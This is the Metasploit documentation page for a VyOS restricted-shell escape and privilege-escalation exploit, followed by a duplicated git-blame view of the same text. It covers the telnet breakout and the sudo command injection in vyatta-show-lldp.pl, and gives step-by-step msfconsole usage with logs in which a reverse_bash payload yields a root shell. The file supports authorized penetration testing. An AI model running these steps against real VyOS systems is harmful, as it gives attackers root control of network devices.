documentation/modules/exploit/linux/ssh/vyos_restricted_shell_privesc.md

## Vulnerable Application

This module exploits command injection vulnerabilities and an insecure
default sudo configuration on [VyOS](https://www.vyos.io/products/)
versions 1.0.0 <= 1.1.8 to execute arbitrary system commands as root.

VyOS features a `restricted-shell` system shell intended for use by
low privilege users with operator privileges. This module exploits
a vulnerability in the `telnet` command to break out of the restricted
shell, then uses sudo to exploit a command injection vulnerability in
`/opt/vyatta/bin/sudo-users/vyatta-show-lldp.pl` to execute commands
with root privileges.

This module has been tested successfully on VyOS 1.1.8 amd64 and
VyOS 1.0.0 i386.

## Verification Steps

Download:

* https://downloads.vyos.io/?dir=release/legacy/

Login as `vyos` / `vyos`.

Create a new user with `operator` privileges:

```
vyos@vyos:~$ configure
[edit]
vyos@vyos# set system login user jsmith full-name "John Smith"
[edit]
vyos@vyos# set system login user jsmith authentication plaintext-password password
[edit]
vyos@vyos# set system login user jsmith level operator
[edit]
vyos@vyos# commit
s[edit]
vyos@vyos# save
Saving configuration to '/config/config.boot'...
Done
```

Start the OpenSSH service:

```
vyos@vyos:~$ sudo sh
sh-4.1# service ssh start
```

1. Start msfconsole
1. Do: `use exploit/linux/ssh/vyos_restricted_shell_privesc`
1. Do: `set RHOSTS [IP]`
1. Do: `set USERNAME [username]`
1. Do: `set PASSWORD [password]`
1. Do: `set payload [payload]`
1. Do: `set LHOST [IP]`
1. Do: `exploit`

## Options

### USERNAME

SSH username (default: `vyos`)

### PASSWORD

SSH password (default: `vyos`)

## Scenarios

### VyOS 1.1.8 (amd64) - operator user

```
msf6 > use exploit/linux/ssh/vyos_restricted_shell_privesc
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(linux/ssh/vyos_restricted_shell_privesc) > set rhosts 172.16.191.158
rhosts => 172.16.191.158
msf6 exploit(linux/ssh/vyos_restricted_shell_privesc) > set username jsmith
username => jsmith
msf6 exploit(linux/ssh/vyos_restricted_shell_privesc) > set password password
password => password
msf6 exploit(linux/ssh/vyos_restricted_shell_privesc) > check
[*] 172.16.191.158:22 - The service is running, but could not be validated. SSH service detected.
msf6 exploit(linux/ssh/vyos_restricted_shell_privesc) > set lhost 172.16.191.165
lhost => 172.16.191.165
msf6 exploit(linux/ssh/vyos_restricted_shell_privesc) > run

[*] Started reverse TCP handler on 172.16.191.165:4444
[*] 172.16.191.158:22 - Attempt to login to VyOS SSH ...
[+] SSH connection established
[*] Requesting PTY ...
[+] PTY successfully obtained
[*] Requesting shell ...
[+] Remote shell successfully obtained
[*] Remote system is VyOS
[*] Remote session is using restricted-shell. Attempting breakout to system shell ...
[+] Unrestricted system shell successfully obtained. Sending payload ...
[*] Command shell session 1 opened (172.16.191.165:4444 -> 172.16.191.158:36030) at 2020-09-18 11:30:49 -0400

id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux vyos 3.13.11-1-amd64-vyos #1 SMP Sat Nov 11 12:10:30 CET 2017 x86_64 GNU/Linux
cat /etc/issue
Welcome to VyOS - \n \l
```

### VyOS 1.1.8 (amd64) - admin user

```
msf6 > use exploit/linux/ssh/vyos_restricted_shell_privesc
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(linux/ssh/vyos_restricted_shell_privesc) > set rhosts 172.16.191.158
rhosts => 172.16.191.158
msf6 exploit(linux/ssh/vyos_restricted_shell_privesc) > set username vyos
username => vyos
msf6 exploit(linux/ssh/vyos_restricted_shell_privesc) > set password vyos
password => vyos
msf6 exploit(linux/ssh/vyos_restricted_shell_privesc) > check
[*] 172.16.191.158:22 - The service is running, but could not be validated. SSH service detected.
msf6 exploit(linux/ssh/vyos_restricted_shell_privesc) > set lhost 172.16.191.165
lhost => 172.16.191.165
msf6 exploit(linux/ssh/vyos_restricted_shell_privesc) > run

[*] Started reverse TCP handler on 172.16.191.165:4444
[*] 172.16.191.158:22 - Attempt to login to VyOS SSH ...
[+] SSH connection established
[*] Requesting PTY ...
[+] PTY successfully obtained
[*] Requesting shell ...
[+] Remote shell successfully obtained
[*] Remote system is VyOS
[*] Remote session is using unrestricted shell. Launching system shell ...
[+] Unrestricted system shell successfully obtained. Sending payload ...
[*] Command shell session 1 opened (172.16.191.165:4444 -> 172.16.191.158:36103) at 2020-09-18 11:32:49 -0400

id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux vyos 3.13.11-1-amd64-vyos #1 SMP Sat Nov 11 12:10:30 CET 2017 x86_64 GNU/Linux
cat /etc/issue
Welcome to VyOS - \n \l
```
Add VyOS restricted-shell Escape and Privilege Escalation 2020-09-11 18:19:25 +00:00			`## Vulnerable Application`

			`This module exploits command injection vulnerabilities and an insecure`
			`default sudo configuration on [VyOS](https://www.vyos.io/products/)`
			`versions 1.0.0 <= 1.1.8 to execute arbitrary system commands as root.`

			VyOS features a `restricted-shell` system shell intended for use by
			`low privilege users with operator privileges. This module exploits`
			a vulnerability in the `telnet` command to break out of the restricted
			`shell, then uses sudo to exploit a command injection vulnerability in`
			`/opt/vyatta/bin/sudo-users/vyatta-show-lldp.pl` to execute commands
			`with root privileges.`

			`This module has been tested successfully on VyOS 1.1.8 amd64 and`
			`VyOS 1.0.0 i386.`

			`## Verification Steps`

			`Download:`

			`* https://downloads.vyos.io/?dir=release/legacy/`

			Login as `vyos` / `vyos`.

			Create a new user with `operator` privileges:

			```
vyos_restricted_shell_privesc: support login as admin user 2020-09-18 15:49:25 +00:00			`vyos@vyos:~$ configure`
Add VyOS restricted-shell Escape and Privilege Escalation 2020-09-11 18:19:25 +00:00			`[edit]`
			`vyos@vyos# set system login user jsmith full-name "John Smith"`
			`[edit]`
vyos_restricted_shell_privesc: support login as admin user 2020-09-18 15:49:25 +00:00			`vyos@vyos# set system login user jsmith authentication plaintext-password password`
Add VyOS restricted-shell Escape and Privilege Escalation 2020-09-11 18:19:25 +00:00			`[edit]`
			`vyos@vyos# set system login user jsmith level operator`
			`[edit]`
			`vyos@vyos# commit`
			`s[edit]`
			`vyos@vyos# save`
			`Saving configuration to '/config/config.boot'...`
			`Done`
			```

			`Start the OpenSSH service:`

			```
			`vyos@vyos:~$ sudo sh`
			`sh-4.1# service ssh start`
			```

			`1. Start msfconsole`
			1. Do: `use exploit/linux/ssh/vyos_restricted_shell_privesc`
			1. Do: `set RHOSTS [IP]`
			1. Do: `set USERNAME [username]`
			1. Do: `set PASSWORD [password]`
			1. Do: `set payload [payload]`
			1. Do: `set LHOST [IP]`
			1. Do: `exploit`

			`## Options`

			`### USERNAME`

vyos_restricted_shell_privesc: support login as admin user 2020-09-18 15:49:25 +00:00			SSH username (default: `vyos`)
Add VyOS restricted-shell Escape and Privilege Escalation 2020-09-11 18:19:25 +00:00
			`### PASSWORD`

vyos_restricted_shell_privesc: support login as admin user 2020-09-18 15:49:25 +00:00			SSH password (default: `vyos`)
Add VyOS restricted-shell Escape and Privilege Escalation 2020-09-11 18:19:25 +00:00
			`## Scenarios`

vyos_restricted_shell_privesc: support login as admin user 2020-09-18 15:49:25 +00:00			`### VyOS 1.1.8 (amd64) - operator user`
Add VyOS restricted-shell Escape and Privilege Escalation 2020-09-11 18:19:25 +00:00
			```
vyos_restricted_shell_privesc: support login as admin user 2020-09-18 15:49:25 +00:00			`msf6 > use exploit/linux/ssh/vyos_restricted_shell_privesc`
Add VyOS restricted-shell Escape and Privilege Escalation 2020-09-11 18:19:25 +00:00			`[*] Using configured payload cmd/unix/reverse_bash`
			`msf6 exploit(linux/ssh/vyos_restricted_shell_privesc) > set rhosts 172.16.191.158`
			`rhosts => 172.16.191.158`
			`msf6 exploit(linux/ssh/vyos_restricted_shell_privesc) > set username jsmith`
			`username => jsmith`
vyos_restricted_shell_privesc: support login as admin user 2020-09-18 15:49:25 +00:00			`msf6 exploit(linux/ssh/vyos_restricted_shell_privesc) > set password password`
			`password => password`
Add VyOS restricted-shell Escape and Privilege Escalation 2020-09-11 18:19:25 +00:00			`msf6 exploit(linux/ssh/vyos_restricted_shell_privesc) > check`
			`[*] 172.16.191.158:22 - The service is running, but could not be validated. SSH service detected.`
vyos_restricted_shell_privesc: support login as admin user 2020-09-18 15:49:25 +00:00			`msf6 exploit(linux/ssh/vyos_restricted_shell_privesc) > set lhost 172.16.191.165`
Add VyOS restricted-shell Escape and Privilege Escalation 2020-09-11 18:19:25 +00:00			`lhost => 172.16.191.165`
			`msf6 exploit(linux/ssh/vyos_restricted_shell_privesc) > run`

vyos_restricted_shell_privesc: support login as admin user 2020-09-18 15:49:25 +00:00			`[*] Started reverse TCP handler on 172.16.191.165:4444`
Add VyOS restricted-shell Escape and Privilege Escalation 2020-09-11 18:19:25 +00:00			`[*] 172.16.191.158:22 - Attempt to login to VyOS SSH ...`
			`[+] SSH connection established`
			`[*] Requesting PTY ...`
			`[+] PTY successfully obtained`
			`[*] Requesting shell ...`
			`[+] Remote shell successfully obtained`
vyos_restricted_shell_privesc: support login as admin user 2020-09-18 15:49:25 +00:00			`[*] Remote system is VyOS`
			`[*] Remote session is using restricted-shell. Attempting breakout to system shell ...`
			`[+] Unrestricted system shell successfully obtained. Sending payload ...`
			`[*] Command shell session 1 opened (172.16.191.165:4444 -> 172.16.191.158:36030) at 2020-09-18 11:30:49 -0400`
Add VyOS restricted-shell Escape and Privilege Escalation 2020-09-11 18:19:25 +00:00
			`id`
			`uid=0(root) gid=0(root) groups=0(root)`
			`uname -a`
			`Linux vyos 3.13.11-1-amd64-vyos #1 SMP Sat Nov 11 12:10:30 CET 2017 x86_64 GNU/Linux`
			`cat /etc/issue`
			`Welcome to VyOS - \n \l`
vyos_restricted_shell_privesc: support login as admin user 2020-09-18 15:49:25 +00:00			```

			`### VyOS 1.1.8 (amd64) - admin user`

			```
			`msf6 > use exploit/linux/ssh/vyos_restricted_shell_privesc`
			`[*] Using configured payload cmd/unix/reverse_bash`
			`msf6 exploit(linux/ssh/vyos_restricted_shell_privesc) > set rhosts 172.16.191.158`
			`rhosts => 172.16.191.158`
			`msf6 exploit(linux/ssh/vyos_restricted_shell_privesc) > set username vyos`
			`username => vyos`
			`msf6 exploit(linux/ssh/vyos_restricted_shell_privesc) > set password vyos`
			`password => vyos`
			`msf6 exploit(linux/ssh/vyos_restricted_shell_privesc) > check`
			`[*] 172.16.191.158:22 - The service is running, but could not be validated. SSH service detected.`
			`msf6 exploit(linux/ssh/vyos_restricted_shell_privesc) > set lhost 172.16.191.165`
			`lhost => 172.16.191.165`
			`msf6 exploit(linux/ssh/vyos_restricted_shell_privesc) > run`

			`[*] Started reverse TCP handler on 172.16.191.165:4444`
			`[*] 172.16.191.158:22 - Attempt to login to VyOS SSH ...`
			`[+] SSH connection established`
			`[*] Requesting PTY ...`
			`[+] PTY successfully obtained`
			`[*] Requesting shell ...`
			`[+] Remote shell successfully obtained`
			`[*] Remote system is VyOS`
			`[*] Remote session is using unrestricted shell. Launching system shell ...`
			`[+] Unrestricted system shell successfully obtained. Sending payload ...`
			`[*] Command shell session 1 opened (172.16.191.165:4444 -> 172.16.191.158:36103) at 2020-09-18 11:32:49 -0400`
Add VyOS restricted-shell Escape and Privilege Escalation 2020-09-11 18:19:25 +00:00
vyos_restricted_shell_privesc: support login as admin user 2020-09-18 15:49:25 +00:00			`id`
			`uid=0(root) gid=0(root) groups=0(root)`
			`uname -a`
			`Linux vyos 3.13.11-1-amd64-vyos #1 SMP Sat Nov 11 12:10:30 CET 2017 x86_64 GNU/Linux`
			`cat /etc/issue`
			`Welcome to VyOS - \n \l`
Add VyOS restricted-shell Escape and Privilege Escalation 2020-09-11 18:19:25 +00:00			```